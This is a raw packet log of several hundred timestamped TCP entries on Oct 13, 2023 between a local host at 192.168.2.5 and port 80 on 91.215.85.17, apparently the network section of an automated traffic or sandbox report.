Oct 13, 2023 15:20:56.865684032 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.865755081 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.865812063 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.865822077 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.865858078 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.865878105 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.866133928 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.866169930 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.866224051 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.866226912 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.866265059 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.866272926 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.866364002 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.866400003 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.866467953 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.866620064 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.866673946 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.866708040 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.866775036 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.866869926 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.866923094 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.866955042 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.867002964 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.867022038 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.867125988 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.867211103 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.867265940 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.867284060 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.867321968 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.867338896 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.867410898 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.867446899 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.867496014 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.867511988 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.867564917 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.867578030 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.867614031 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.867680073 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.867732048 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.867739916 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.867789030 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.867811918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.867880106 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.867938042 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.867993116 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.868035078 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.868093014 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.868144989 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.868181944 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.868257999 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.868309975 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.868326902 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.868380070 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.868396044 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.868432045 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.868531942 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.868585110 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.868613958 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.868664026 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.868716002 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.868822098 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.868874073 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.868920088 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.868988037 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.869080067 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.869113922 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.869180918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.869251013 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.869306087 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.869435072 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.869493961 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.869505882 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.869548082 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.869640112 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.869668007 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.869676113 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.869729996 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.869765043 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.869891882 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.869950056 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.869957924 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.870028019 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.870081902 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.870090961 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.870127916 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.870184898 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.870196104 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.870419979 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.870479107 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.870498896 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.870570898 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.870608091 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.870625019 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.870682001 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.870754004 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.870819092 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.870862007 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.870965958 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.870985031 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.871061087 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.871062040 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.871098995 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.871099949 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.871176004 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.871180058 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.871193886 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.871249914 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.871273041 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.871304035 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.871359110 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.871407032 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.871433020 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.871484041 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.871535063 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.871596098 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.871659994 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.871712923 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.871730089 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.871772051 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.871800900 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.871849060 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.871892929 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.871937990 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.871942043 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.871999025 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.872035027 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.872116089 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.872132063 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.872201920 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.872221947 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.872273922 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.872277021 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.872312069 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.872385979 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.872433901 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.872438908 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.872473001 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.872493982 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.872531891 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.872586966 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.872639894 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.872668982 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.872699022 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.872714043 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.872765064 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.872818947 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.872821093 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.872888088 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.872975111 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.873020887 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.873033047 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.873066902 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.873087883 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.873172998 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.873255968 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.873300076 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.873305082 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.873339891 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.873357058 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.873452902 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.873533010 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.873584032 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.873653889 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.873699903 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.873876095 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.873924971 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.873941898 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.873991966 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.874006987 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.874053001 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.874075890 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.874093056 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.874183893 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.874229908 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.874233961 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.874268055 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.874296904 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.874314070 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.874392033 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.874453068 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.874456882 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.874490976 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.874509096 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.874587059 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.874660969 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.874713898 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.874717951 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.874763012 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.874799013 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.874914885 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.874979019 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.875027895 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.875032902 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.875068903 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.875083923 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.875101089 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.875194073 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.875247955 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.875248909 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.875293016 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.875320911 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.875380993 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.875447989 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.875483036 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.875494003 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.875526905 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.875546932 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.875607014 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.875693083 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.875749111 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.875751019 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.875797987 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.875849009 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.875946045 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.876044989 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.876099110 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.876133919 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.876182079 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.876218081 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.876302004 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.876377106 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.876430988 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.876486063 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.876533985 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.876571894 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.876682997 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.876765013 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.876790047 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.876823902 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.876924992 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.876976013 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.877006054 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.877058983 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.877089024 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.877166033 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.877213955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.877254963 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.877269030 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.877299070 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.877307892 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.877372026 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.877444029 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.877485991 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.877487898 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.877537012 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.877577066 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.877671957 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.877743006 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.877789021 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.877862930 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.877913952 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.877945900 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.878021955 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.878082037 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.878134966 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.878165007 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.878212929 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.878247976 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.878339052 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.878421068 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.878468990 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.878475904 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.878521919 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.878557920 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.878638983 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.878696918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.878747940 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.878751993 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.878799915 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.878808022 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.878896952 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.878976107 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.879024982 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.879039049 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.879091024 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.879127979 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.879215002 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.879285097 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.879334927 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.879354954 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.879403114 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.879437923 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.879501104 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.879580021 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.879596949 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.879633904 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.879667044 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.879676104 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.879764080 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.879815102 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.879848003 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.879878044 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.879944086 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.879981041 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.879995108 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.880029917 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.880064964 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.880191088 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.880228996 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.880275011 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.880289078 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.880341053 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.880362034 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.880448103 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.880497932 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.880539894 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.880549908 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.880580902 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.880635023 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.880695105 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.880742073 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.880795002 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.880800962 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.880846977 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.880899906 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.880948067 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.881001949 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.881036043 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.881170988 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.881259918 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.881308079 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.881345987 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.881387949 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.881458998 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.881481886 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.881582022 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.881624937 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.881630898 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.881673098 CEST	49721	80	192.168.2.5	91.215.85.17
Oct 13, 2023 15:20:56.881688118 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.881750107 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.881814003 CEST	80	49721	91.215.85.17	192.168.2.5
Oct 13, 2023 15:20:56.881856918 CEST	49721	80	192.168.2.5	91.215.85.17
